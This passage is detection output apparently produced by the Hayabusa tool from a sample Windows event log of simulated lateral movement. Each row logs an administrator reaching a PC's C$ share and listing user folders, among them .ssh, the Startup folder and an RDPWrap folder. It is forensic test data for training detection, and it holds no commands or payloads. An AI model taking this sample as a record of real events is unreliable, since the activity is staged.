Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\.ssh | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\New folder | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\RDPWrap-v1.6.2 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\translations | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\db | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\garbage | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\memdumps | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\platforms | IP Addr: 10.0.2.15 | LID: 